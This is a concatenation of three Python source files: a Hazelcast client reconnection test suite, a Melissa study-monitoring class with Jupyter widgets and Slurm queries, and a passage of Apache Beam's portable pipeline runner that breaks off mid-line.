reconnect_test.py
|
import sys
import time
from threading import Thread, Event
from hazelcast import HazelcastClient
from hazelcast.errors import HazelcastError, TargetDisconnectedError
from hazelcast.lifecycle import LifecycleState
from hazelcast.util import AtomicInteger
from tests.base import HazelcastTestCase
from tests.util import event_collector
class ReconnectTest(HazelcastTestCase):
rc = None
def setUp(self):
self.rc = self.create_rc()
self.cluster = self.create_cluster(self.rc)
def tearDown(self):
self.shutdown_all_clients()
self.rc.exit()
def test_start_client_with_no_member(self):
with self.assertRaises(HazelcastError):
self.create_client(
{
"cluster_members": [
"127.0.0.1:5701",
"127.0.0.1:5702",
"127.0.0.1:5703",
],
"cluster_connect_timeout": 2,
}
)
def test_start_client_before_member(self):
def run():
time.sleep(1.0)
self.cluster.start_member()
t = Thread(target=run)
t.start()
self.create_client(
{
"cluster_name": self.cluster.id,
"cluster_connect_timeout": 5.0,
}
)
t.join()
def test_restart_member(self):
member = self.cluster.start_member()
client = self.create_client(
{
"cluster_name": self.cluster.id,
"cluster_connect_timeout": 5.0,
}
)
state = [None]
def listener(s):
state[0] = s
client.lifecycle_service.add_listener(listener)
member.shutdown()
self.assertTrueEventually(lambda: self.assertEqual(state[0], LifecycleState.DISCONNECTED))
self.cluster.start_member()
self.assertTrueEventually(lambda: self.assertEqual(state[0], LifecycleState.CONNECTED))
def test_listener_re_register(self):
member = self.cluster.start_member()
client = self.create_client(
{
"cluster_name": self.cluster.id,
"cluster_connect_timeout": 5.0,
}
)
map = client.get_map("map").blocking()
collector = event_collector()
reg_id = map.add_entry_listener(added_func=collector)
self.logger.info("Registered listener with id %s", reg_id)
member.shutdown()
self.cluster.start_member()
count = AtomicInteger()
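# map.put may still fail with TargetDisconnectedError while the client is
# reconnecting, so keep retrying with fresh keys until a put succeeds, then
# check that the re-registered listener observed at least one added event.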
def assert_events():
if client.lifecycle_service.is_running():
while True:
try:
map.put("key-%d" % count.get_and_increment(), "value")
break
except TargetDisconnectedError:
pass
self.assertGreater(len(collector.events), 0)
else:
self.fail("Client disconnected...")
self.assertTrueEventually(assert_events)
def test_member_list_after_reconnect(self):
old_member = self.cluster.start_member()
client = self.create_client(
{
"cluster_name": self.cluster.id,
"cluster_connect_timeout": 5.0,
}
)
old_member.shutdown()
new_member = self.cluster.start_member()
def assert_member_list():
members = client.cluster_service.get_members()
self.assertEqual(1, len(members))
self.assertEqual(new_member.uuid, str(members[0].uuid))
self.assertTrueEventually(assert_member_list)
def test_reconnect_toNewNode_ViaLastMemberList(self):
old_member = self.cluster.start_member()
client = self.create_client(
{
"cluster_name": self.cluster.id,
"cluster_members": [
"127.0.0.1:5701",
],
"smart_routing": False,
"cluster_connect_timeout": 10.0,
}
)
new_member = self.cluster.start_member()
old_member.shutdown()
def assert_member_list():
members = client.cluster_service.get_members()
self.assertEqual(1, len(members))
self.assertEqual(new_member.uuid, str(members[0].uuid))
self.assertTrueEventually(assert_member_list)
class ReconnectWithDifferentInterfacesTest(HazelcastTestCase):
def _create_cluster_config(self, public_address, heartbeat_seconds=300):
return """<?xml version="1.0" encoding="UTF-8"?>
<hazelcast xmlns="http://www.hazelcast.com/schema/config"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.hazelcast.com/schema/config
http://www.hazelcast.com/schema/config/hazelcast-config-4.0.xsd">
<network>
<public-address>%s</public-address>
</network>
<properties>
<property name="hazelcast.client.max.no.heartbeat.seconds">%d</property>
</properties>
</hazelcast>""" % (
public_address,
heartbeat_seconds,
)
def setUp(self):
self.rc = self.create_rc()
self.client = None
def tearDown(self):
if self.client:
# If the test failed and we could not shut down
# the client, try to shut it down here to make sure
# we do not affect other tests. If the client is
# already shut down, this is basically a no-op.
self.client.shutdown()
self.rc.exit()
def test_connection_count_after_reconnect_with_member_hostname_client_ip(self):
self._verify_connection_count_after_reconnect("localhost", "127.0.0.1")
def test_connection_count_after_reconnect_with_member_hostname_client_hostname(self):
self._verify_connection_count_after_reconnect("localhost", "localhost")
def test_connection_count_after_reconnect_with_member_ip_client_ip(self):
self._verify_connection_count_after_reconnect("127.0.0.1", "127.0.0.1")
def test_connection_count_after_reconnect_with_member_ip_client_hostname(self):
self._verify_connection_count_after_reconnect("127.0.0.1", "localhost")
def test_listeners_after_client_disconnected_with_member_hostname_client_ip(self):
self._verify_listeners_after_client_disconnected("localhost", "127.0.0.1")
def test_listeners_after_client_disconnected_with_member_hostname_client_hostname(self):
self._verify_listeners_after_client_disconnected("localhost", "localhost")
def test_listeners_after_client_disconnected_with_member_ip_client_ip(self):
self._verify_listeners_after_client_disconnected("127.0.0.1", "127.0.0.1")
def test_listeners_after_client_disconnected_with_member_ip_client_hostname(self):
self._verify_listeners_after_client_disconnected("127.0.0.1", "localhost")
def _verify_connection_count_after_reconnect(self, member_address, client_address):
cluster = self.create_cluster(self.rc, self._create_cluster_config(member_address))
member = cluster.start_member()
disconnected = Event()
reconnected = Event()
def listener(state):
if state == "DISCONNECTED":
disconnected.set()
if state == "CONNECTED" and disconnected.is_set():
reconnected.set()
client = HazelcastClient(
cluster_name=cluster.id,
cluster_members=[client_address],
cluster_connect_timeout=sys.maxsize,
lifecycle_listeners=[listener],
)
self.client = client
self.assertTrueEventually(
lambda: self.assertEqual(1, len(client._connection_manager.active_connections))
)
member.shutdown()
self.assertTrueEventually(lambda: self.assertTrue(disconnected.is_set()))
cluster.start_member()
self.assertTrueEventually(lambda: self.assertTrue(reconnected.is_set()))
self.assertEqual(1, len(client._connection_manager.active_connections))
client.shutdown()
self.rc.terminateCluster(cluster.id)
def _verify_listeners_after_client_disconnected(self, member_address, client_address):
heartbeat_seconds = 2
cluster = self.create_cluster(
self.rc, self._create_cluster_config(member_address, heartbeat_seconds)
)
member = cluster.start_member()
client = HazelcastClient(
cluster_name=cluster.id,
cluster_members=[client_address],
cluster_connect_timeout=sys.maxsize,
)
self.client = client
test_map = client.get_map("test").blocking()
event_count = AtomicInteger()
test_map.add_entry_listener(
added_func=lambda _: event_count.get_and_increment(), include_value=False
)
self.assertTrueEventually(
lambda: self.assertEqual(1, len(client._connection_manager.active_connections))
)
member.shutdown()
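# Sleep past the heartbeat timeout so the client notices the dead connection
# before the replacement member is started.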
time.sleep(2 * heartbeat_seconds)
cluster.start_member()
def assertion():
test_map.remove(1)
test_map.put(1, 2)
self.assertNotEqual(0, event_count.get())
self.assertTrueEventually(assertion)
client.shutdown()
self.rc.terminateCluster(cluster.id)
|
main.py
|
from threading import Thread
from collections import Counter, OrderedDict
import subprocess
import time, datetime
import statistics
from IPython.display import display
import ipywidgets as widgets
import matplotlib
from launcher.study import Study
import sys
sys.path.append('/home/docker/melissa/melissa')
sys.path.append('/home/docker/melissa/melissa/install-oardocker/share/melissa/launcher')
import job_scheduler_config
class MelissaMonitoring:
def __init__(self, study_options, melissa_stats, user_functions):
self.study = Study(study_options, melissa_stats, user_functions)
self.jobStates = {-1:'Not submitted', 0:'Waiting', 1:'Running', 2:'Finished', 4:'Timeout'}
self.timeStart = None
self.timeStop = None
self.thread = None
self.state_checker = None
self.jobRestartThreshold = 3
self.coreUsageData = None
self.sobolConfidenceInterval = None
self.timeWidget = None
self.serverStatusWidget = None
self.failedParametersWidget = None
self.jobsCPUCountWidget = None
self.scheduler = job_scheduler_config.scheduler
def startStudyInThread(self):
"""Starts study with options from the constructor
Returns:
Thread -- Thread object used to control the study
"""
self.coreUsageData = OrderedDict()
# initialize here so plotSobolConfidenceInterval can record samples
self.sobolConfidenceInterval = OrderedDict()
self.thread = Thread(target=self.study.run)
self.thread.start()
self.timeStart = datetime.datetime.now()
return self.thread
def waitForInitialization(self):
"""Waits for melissa server to fully initialize
"""
while self.study.threads.get('state_checker', None) is None:
time.sleep(0.001)
self.state_checker = self.study.threads['state_checker']
while not self.state_checker.is_alive():
time.sleep(0.001)
def isStudyRunning(self):
"""Checks if study is still running
Returns:
Bool -- Is study still running?
"""
return self.state_checker.running_study if self.state_checker.is_alive() else False
def getJobStatusData(self):
"""Get dictionary with current number of jobs with particular job status
Returns:
Dictionary -- Mapped as jobStatus -> numberOfJobs
"""
data = dict(Counter(map(lambda x: x.job_status, self.study.groups)))
return {self.jobStates[statusCode]: value for statusCode, value in data.items()}
def getServerStatusData(self):
"""Get server job status
Returns:
string -- Server job status
"""
return self.jobStates[self.study.server_obj[0].status]
def getCPUCount(self): ## TODO: remove
"""Get the number of user's current total CPU usage. Slurm specific
Returns:
int -- number of CPU's in usage
"""
ids = self.getJobsIDs()
process = subprocess.Popen('squeue -h -o "%C" -j {} -t RUNNING'.format(",".join(ids)),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
universal_newlines=True)
out, _ = process.communicate()
return sum([int(x) for x in list(out.splitlines())])
def getJobCPUCount(self, ID): ## TODO: remove
"""Get CPU usage of particular job. Slurm specific
Arguments:
ID {str} -- id of the job
Returns:
str -- CPU usage of the job
"""
process = subprocess.Popen('squeue -h -o "%C" -j {} -t RUNNING'.format(ID),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
universal_newlines=True)
out, _ = process.communicate()
return str(out).strip()
def getJobsCPUCount(self): ## TODO: remove
"""Get the current CPU usage of your jobs. Slurm specific
Returns:
Dict[str,str] -- Mapped as name_of_the_job -> CPU_usage
"""
ids = self.getJobsIDs()
process = subprocess.Popen('squeue -h -o "%j %C" -j {} -t RUNNING'.format(",".join(ids)),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
universal_newlines=True)
out, _ = process.communicate()
return dict(map(lambda x: tuple(x.split(' ')), out.splitlines()))
def getRemainingJobsTime(self): ## TODO: remove
"""Get the current remaining time of your jobs. Slurm specific
Returns:
Dict[str,str] -- Mapped as name_of_the_job -> remaining_time
"""
ids = self.getJobsIDs()
process = subprocess.Popen('squeue -h -o "%j %L" -j {} -t RUNNING'.format(",".join(ids)),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
universal_newlines=True)
out, _ = process.communicate()
return dict(map(lambda x: tuple(x.split(' ')), out.splitlines()))
def getJobsIDs(self, include_server = True):
"""Get the list of jobs ids'
Keyword Arguments:
include_server {bool} -- Include server ID in the list (default: {True})
Returns:
List[str] -- List of job IDs
"""
data = list(map(lambda x: str(x.job_id), self.study.groups))
if include_server:
data.append(str(self.study.server_obj[0].job_id))
return data
def getServerID(self):
"""Get server ID
Returns:
str -- server ID
"""
return str(self.study.server_obj[0].job_id)
def getFailedParametersList(self):
"""Get list of failed parameters in the study
Returns:
list -- nested list of failed parameters
"""
data = filter(lambda x: x.nb_restarts > self.jobRestartThreshold, self.study.groups)
return list(map(lambda x: x.param_set, data))
def getSobolConfidenceInterval(self):
"""Get current sobol confidence interval
If Sobol indices were not selected in the options file, this function always returns None.
Returns:
float -- real number between 1 and 2
or
None -- if confidence interval couldn't be calculated at the moment
"""
return self.study.threads['messenger'].confidence_interval.get('Sobol', None)
def plotCoresUsage(self, ax):
"""Automatically plot cores usage as time series
Arguments:
ax {matplotlib.axes} -- Axes object that should be plotted
"""
ax.clear()
self.coreUsageData[datetime.datetime.now() - self.timeStart] = self.scheduler.getTotalCPUCount(self.getJobsIDs())
ax.plot(list(map(lambda x: str(x), self.coreUsageData.keys())), list(self.coreUsageData.values()))
ax.set_title('Cores usage vs time')
ax.get_figure().autofmt_xdate()
def plotJobStatus(self, ax):
"""Automatically plot job statuses as pie chart
Arguments:
ax {matplotlib.axes} -- Axes object that should be plotted
"""
jobStatusData = self.getJobStatusData()
ax.clear()
sumOfJobs = sum(jobStatusData.values())
sizes = [x/sumOfJobs*100 for x in jobStatusData.values()]
labels = [x for x in jobStatusData.keys()]
ax.pie(sizes, labels=labels, autopct='%1.1f%%', startangle=90)
ax.set_title('Job statuses')
def plotSobolConfidenceInterval(self, ax):
"""Automatically plot cores usage as time series.
If Sobol Indicies wasn't selected in the options file, nothing will be plotted.
Arguments:
ax {matplotlib.axes} -- Axes object that should be plotted
"""
data = self.getSobolConfidenceInterval()
if data is not None:
ax.clear()
self.sobolConfidenceInterval[datetime.datetime.now() - self.timeStart] = data
ax.plot(list(map(lambda x: str(x), self.sobolConfidenceInterval.keys())), list(self.sobolConfidenceInterval.values()))
ax.set_title('Sobol confidence interval')
ax.get_figure().autofmt_xdate()
def _createJobsCPUCountWidget(self):
"""Create jobs cpu count widget, used by showJobsCPUCount & MelissaDash
Returns:
widgets.HTML -- custom widget for showing jobs' CPU count
"""
style = {'description_width': 'initial'}
self.jobsCPUCountWidget = widgets.HTML(value="",
description='Jobs CPU count: ',
style=style,
)
return self.jobsCPUCountWidget
def showJobsCPUCount(self):
"""Create widget (if not created) & show jobs cpu count of your jobs on cluster
"""
if self.jobsCPUCountWidget is None:
self._createJobsCPUCountWidget()
display(self.jobsCPUCountWidget)
data = self.scheduler.getCPUCountByJob(self.getJobsIDs())
data = ['{} - {}'.format(k,v) for k,v in data.items()]
value = '<br/>'.join(data)
self.jobsCPUCountWidget.value = value
def _createRemainingJobsTimeWidget(self):
"""Create remaining time widget, used by showRemainingJobsTime & MelissaDash
Returns:
widgets.HTML -- custom widget for showing jobs' remaining time
"""
style = {'description_width': 'initial'}
self.timeWidget = widgets.HTML(value="",
description='Remaining job time: ',
style=style,
)
return self.timeWidget
def showRemainingJobsTime(self):
"""Create widget (if not created) & show remaining time of your jobs on cluster
"""
if self.timeWidget is None:
self._createRemainingJobsTimeWidget()
display(self.timeWidget)
data = self.scheduler.getRemainingJobsTime(self.getJobsIDs())
data = ['{} - {}'.format(k,v) for k,v in data.items()]
value = '<br/>'.join(data)
self.timeWidget.value = value
def _createServerStatusWidget(self):
"""Create server status widget, used by showServerStatus & MelissaDash
Returns:
widgets.HTML -- custom widget for showing server status
"""
style = {'description_width': 'initial'}
self.serverStatusWidget = widgets.HTML(value="",
description='Server status: ',
style=style,
)
return self.serverStatusWidget
def showServerStatus(self):
"""Create widget (if not created) & show the status of the Melissa server
"""
if self.serverStatusWidget is None:
self._createServerStatusWidget()
display(self.serverStatusWidget)
self.serverStatusWidget.value = self.getServerStatusData()
def _createFailedParametersWidget(self):
"""Create failed parameters widget, used by showServerStatus & MelissaDash
Returns:
widgets.HTML -- customed widget for showing failed parameters
"""
style = {'description_width': 'initial'}
self.failedParametersWidget = widgets.HTML(value="",
description='Failed parameters: ',
style=style,
)
return self.failedParametersWidget
def showFailedParameters(self):
"""Create widget (if not created) & show simulations' failed parameters
"""
if self.failedParametersWidget is None:
self._createFailedParametersWidget()
display(self.failedParametersWidget)
data = self.getFailedParametersList()
value = '<br/>'.join(map(lambda x: str(x), data))
self.failedParametersWidget.value = value
def cleanUp(self):
"""Clean up after study
"""
self.thread.join()
self.timeStop = datetime.datetime.now()
self.thread = None
self.state_checker = None
if self.timeWidget is not None:
self.timeWidget.close()
self.timeWidget = None
if self.serverStatusWidget is not None:
self.serverStatusWidget.close()
self.serverStatusWidget = None
if self.failedParametersWidget is not None:
self.failedParametersWidget.close()
self.failedParametersWidget = None
if self.jobsCPUCountWidget is not None:
self.jobsCPUCountWidget.close()
self.jobsCPUCountWidget = None
def getStudyInfo(self):
"""Get info about performed study such as time and cores used
Returns:
str -- info about study
"""
info = """
Study started: {}
Study ended: {}
Elapsed time: {}
Max cores used: {}
Avg cores used: {}
""".format(self.timeStart, self.timeStop, self.timeStop - self.timeStart,
max(list(self.coreUsageData.values())), statistics.mean(list(self.coreUsageData.values())))
return info
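# A minimal monitoring-loop sketch (illustrative, not part of the original class;
# study_options, melissa_stats and user_functions are assumed to come from the
# usual Melissa options file):
#
#   monitoring = MelissaMonitoring(study_options, melissa_stats, user_functions)
#   monitoring.startStudyInThread()
#   monitoring.waitForInitialization()
#   while monitoring.isStudyRunning():
#       monitoring.showServerStatus()
#       monitoring.showFailedParameters()
#       time.sleep(5)
#   monitoring.cleanUp()
#   print(monitoring.getStudyInfo())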
|
portable_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
# mypy: check-untyped-defs
import atexit
import functools
import itertools
import logging
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import Dict
from typing import Iterator
from typing import Optional
from typing import Tuple
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.options.value_provider import ValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner.fn_runner import translations
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.pipeline import Pipeline
from apache_beam.portability.api import beam_runner_api_pb2
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.DRAINED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
_LOGGER = logging.getLogger(__name__)
class JobServiceHandle(object):
"""
Encapsulates the interactions necessary to submit a pipeline to a job service.
The base set of interactions consists of 3 steps:
- prepare
- stage
- run
"""
def __init__(self, job_service, options, retain_unknown_options=False):
self.job_service = job_service
self.options = options
self.timeout = options.view_as(PortableOptions).job_server_timeout
self.artifact_endpoint = options.view_as(PortableOptions).artifact_endpoint
self._retain_unknown_options = retain_unknown_options
def submit(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""
Submit and run the pipeline defined by `proto_pipeline`.
"""
prepare_response = self.prepare(proto_pipeline)
artifact_endpoint = (
self.artifact_endpoint or
prepare_response.artifact_staging_endpoint.url)
self.stage(
proto_pipeline,
artifact_endpoint,
prepare_response.staging_session_token)
return self.run(prepare_response.preparation_id)
def get_pipeline_options(self):
# type: () -> struct_pb2.Struct
"""
Get `self.options` as a protobuf Struct
"""
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return self.job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=self.timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc.RpcError as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
options_response = send_options_request()
def add_runner_options(parser):
for option in options_response.options:
try:
# no default values - we don't want runner options
# added unless they were specified by the user
add_arg_args = {'action': 'store', 'help': option.description}
if option.type == beam_job_api_pb2.PipelineOptionType.BOOLEAN:
add_arg_args['action'] = 'store_true' \
if option.default_value != 'true' else 'store_false'
elif option.type == beam_job_api_pb2.PipelineOptionType.INTEGER:
add_arg_args['type'] = int
elif option.type == beam_job_api_pb2.PipelineOptionType.ARRAY:
add_arg_args['action'] = 'append'
parser.add_argument("--%s" % option.name, **add_arg_args)
except Exception as e:
# ignore runner options that are already present
# only in this case is duplicate not treated as error
if 'conflicting option string' not in str(e):
raise
_LOGGER.debug("Runner option '%s' was already added" % option.name)
all_options = self.options.get_all_options(
add_extra_args_fn=add_runner_options,
retain_unknown_options=self._retain_unknown_options)
return self.encode_pipeline_options(all_options)
@staticmethod
def encode_pipeline_options(
all_options: Dict[str, Any]) -> 'struct_pb2.Struct':
def convert_pipeline_option_value(v):
# convert int values: BEAM-5509
if type(v) == int:
return str(v)
elif isinstance(v, ValueProvider):
return convert_pipeline_option_value(
v.get()) if v.is_accessible() else None
return v
# TODO: Define URNs for options.
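# For example (illustrative), {'job_name': 'job', 'parallelism': 4} becomes a
# Struct with 'beam:option:job_name:v1' -> 'job' and
# 'beam:option:parallelism:v1' -> '4' (ints are stringified, see BEAM-5509).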
p_options = {
'beam:option:' + k + ':v1': convert_pipeline_option_value(v)
for k,
v in all_options.items() if v is not None
}
return job_utils.dict_to_struct(p_options)
def prepare(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> beam_job_api_pb2.PrepareJobResponse
"""Prepare the job on the job service"""
return self.job_service.Prepare(
beam_job_api_pb2.PrepareJobRequest(
job_name='job',
pipeline=proto_pipeline,
pipeline_options=self.get_pipeline_options()),
timeout=self.timeout)
def stage(self,
proto_pipeline, # type: beam_runner_api_pb2.Pipeline
artifact_staging_endpoint,
staging_session_token
):
# type: (...) -> None
"""Stage artifacts"""
if artifact_staging_endpoint:
artifact_service.offer_artifacts(
beam_artifact_api_pb2_grpc.ArtifactStagingServiceStub(
channel=grpc.insecure_channel(artifact_staging_endpoint)),
artifact_service.ArtifactRetrievalService(
artifact_service.BeamFilesystemHandler(None).file_reader),
staging_session_token)
def run(self, preparation_id):
# type: (str) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""Run the job"""
try:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=preparation_id),
timeout=self.timeout)
# If there's an error, we don't always get it until we try to read.
# Fortunately, there's always an immediate current state published.
state_stream = itertools.chain([next(state_stream)], state_stream)
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=preparation_id),
timeout=self.timeout)
except Exception:
# TODO(BEAM-6442): Unify preparation_id and job_id for all runners.
state_stream = message_stream = None
# Run the job and wait for a result, we don't set a timeout here because
# it may take a long time for a job to complete and streaming
# jobs currently never return a response.
run_response = self.job_service.Run(
beam_job_api_pb2.RunJobRequest(preparation_id=preparation_id))
if state_stream is None:
state_stream = self.job_service.GetStateStream(
beam_job_api_pb2.GetJobStateRequest(job_id=run_response.job_id))
message_stream = self.job_service.GetMessageStream(
beam_job_api_pb2.JobMessagesRequest(job_id=run_response.job_id))
return run_response.job_id, message_stream, state_stream
class PortableRunner(runner.PipelineRunner):
"""
Experimental: No backward compatibility guaranteed.
A BeamRunner that executes Python pipelines via the Beam Job API.
This runner is a stub and does not run the actual job.
This runner schedules the job on a job service. The responsibility of
running and managing the job lies with the job service used.
"""
def __init__(self):
self._dockerized_job_server = None # type: Optional[job_server.JobServer]
@staticmethod
def _create_environment(options):
# type: (PipelineOptions) -> environments.Environment
portable_options = options.view_as(PortableOptions)
# Do not set a Runner. Otherwise this can cause problems in Java's
# PipelineOptions, i.e. ClassNotFoundException, if the corresponding Runner
# does not exist in the Java SDK. In portability, the entry point is clearly
# defined via the JobService.
portable_options.view_as(StandardOptions).runner = None
environment_type = portable_options.environment_type
if not environment_type:
environment_urn = common_urns.environments.DOCKER.urn
elif environment_type.startswith('beam:env:'):
environment_urn = environment_type
else:
# e.g. handle LOOPBACK -> EXTERNAL
environment_type = ENV_TYPE_ALIASES.get(
environment_type, environment_type)
try:
environment_urn = getattr(
common_urns.environments, environment_type).urn
except AttributeError:
raise ValueError('Unknown environment type: %s' % environment_type)
env_class = environments.Environment.get_env_cls_from_urn(environment_urn)
return env_class.from_options(portable_options)
def default_job_server(self, options):
raise NotImplementedError(
'You must specify a --job_endpoint when using --runner=PortableRunner. '
'Alternatively, you may specify which portable runner you intend to '
'use, such as --runner=FlinkRunner or --runner=SparkRunner.')
def create_job_service_handle(self, job_service, options):
# type: (...) -> JobServiceHandle
return JobServiceHandle(job_service, options)
def create_job_service(self, options):
# type: (PipelineOptions) -> JobServiceHandle
"""
Start the job service and return a `JobServiceHandle`
"""
job_endpoint = options.view_as(PortableOptions).job_endpoint
if job_endpoint:
if job_endpoint == 'embed':
server = job_server.EmbeddedJobServer() # type: job_server.JobServer
else:
job_server_timeout = options.view_as(PortableOptions).job_server_timeout
server = job_server.ExternalJobServer(job_endpoint, job_server_timeout)
else:
server = self.default_job_server(options)
return self.create_job_service_handle(server.start(), options)
@staticmethod
def get_proto_pipeline(pipeline, options):
# type: (Pipeline, PipelineOptions) -> beam_runner_api_pb2.Pipeline
portable_options = options.view_as(PortableOptions)
proto_pipeline = pipeline.to_runner_api(
default_environment=PortableRunner._create_environment(
portable_options))
# TODO: https://issues.apache.org/jira/browse/BEAM-7199
# Eventually remove the 'pre_optimize' option altogether and only perform
# the equivalent of the 'default' case below (minus the 'lift_combiners'
# part).
pre_optimize = options.view_as(DebugOptions).lookup_experiment(
'pre_optimize', 'default').lower()
if (not options.view_as(StandardOptions).streaming and
pre_optimize != 'none'):
if pre_optimize == 'default':
phases = [
# TODO: https://issues.apache.org/jira/browse/BEAM-4678
# https://issues.apache.org/jira/browse/BEAM-11478
# Eventually remove the 'lift_combiners' phase from 'default'.
translations.pack_combiners,
translations.lift_combiners,
translations.sort_stages
]
partial = True
elif pre_optimize == 'all':
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = False
elif pre_optimize == 'all_except_fusion':
# TODO(BEAM-7248): Delete this branch after PortableRunner supports
# beam:runner:executable_stage:v1.
phases = [
translations.annotate_downstream_side_inputs,
translations.annotate_stateful_dofns_as_roots,
translations.fix_side_input_pcoll_coders,
translations.pack_combiners,
translations.lift_combiners,
translations.expand_sdf,
translations.fix_flatten_coders,
# translations.sink_flattens,
# translations.greedily_fuse,
translations.read_to_impulse,
translations.extract_impulse_stages,
translations.remove_data_plane_ops,
translations.sort_stages
]
partial = True
else:
phases = []
for phase_name in pre_optimize.split(','):
# For now, these are all we allow.
if phase_name in ('pack_combiners', 'lift_combiners'):
phases.append(getattr(translations, phase_name))
else:
raise ValueError(
'Unknown or inapplicable phase for pre_optimize: %s' %
phase_name)
phases.append(translations.sort_stages)
partial = True
# All (known) portable runners (i.e. Flink and Spark) support these URNs.
known_urns = frozenset([
common_urns.composites.RESHUFFLE.urn,
common_urns.primitives.IMPULSE.urn,
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn
])
proto_pipeline = translations.optimize_pipeline(
proto_pipeline,
phases=phases,
known_runner_urns=known_urns,
partial=partial)
return proto_pipeline
def run_pipeline(self, pipeline, options):
# type: (Pipeline, PipelineOptions) -> PipelineResult
portable_options = options.view_as(PortableOptions)
# TODO: https://issues.apache.org/jira/browse/BEAM-5525
# portable runner specific default
if options.view_as(SetupOptions).sdk_location == 'default':
options.view_as(SetupOptions).sdk_location = 'container'
experiments = options.view_as(DebugOptions).experiments or []
# This is needed as we start a worker server if one is requested
# but none is provided.
if portable_options.environment_type == 'LOOPBACK':
use_loopback_process_worker = options.view_as(
DebugOptions).lookup_experiment('use_loopback_process_worker', False)
portable_options.environment_config, server = (
worker_pool_main.BeamFnExternalWorkerPoolServicer.start(
state_cache_size=
sdk_worker_main._get_state_cache_size(experiments),
data_buffer_time_limit_ms=
sdk_worker_main._get_data_buffer_time_limit_ms(experiments),
use_process=use_loopback_process_worker))
cleanup_callbacks = [functools.partial(server.stop, 1)]
else:
cleanup_callbacks = []
proto_pipeline = self.get_proto_pipeline(pipeline, options)
job_service_handle = self.create_job_service(options)
job_id, message_stream, state_stream = \
job_service_handle.submit(proto_pipeline)
result = PipelineResult(
job_service_handle.job_service,
job_id,
message_stream,
state_stream,
cleanup_callbacks)
if cleanup_callbacks:
# Register an exit handler to ensure cleanup on exit.
atexit.register(functools.partial(result._cleanup, on_exit=True))
_LOGGER.info(
'Environment "%s" has started a component necessary for the '
'execution. Be sure to run the pipeline using\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.',
portable_options.environment_type)
return result
class PortableMetrics(metric.MetricResults):
def __init__(self, job_metrics_response):
metrics = job_metrics_response.metrics
self.attempted = portable_metrics.from_monitoring_infos(metrics.attempted)
self.committed = portable_metrics.from_monitoring_infos(metrics.committed)
@staticmethod
def _combine(committed, attempted, filter):
all_keys = set(committed.keys()) | set(attempted.keys())
return [
MetricResult(key, committed.get(key), attempted.get(key))
for key in all_keys if metric.MetricResults.matches(filter, key)
]
def query(self, filter=None):
counters, distributions, gauges = [
self._combine(x, y, filter)
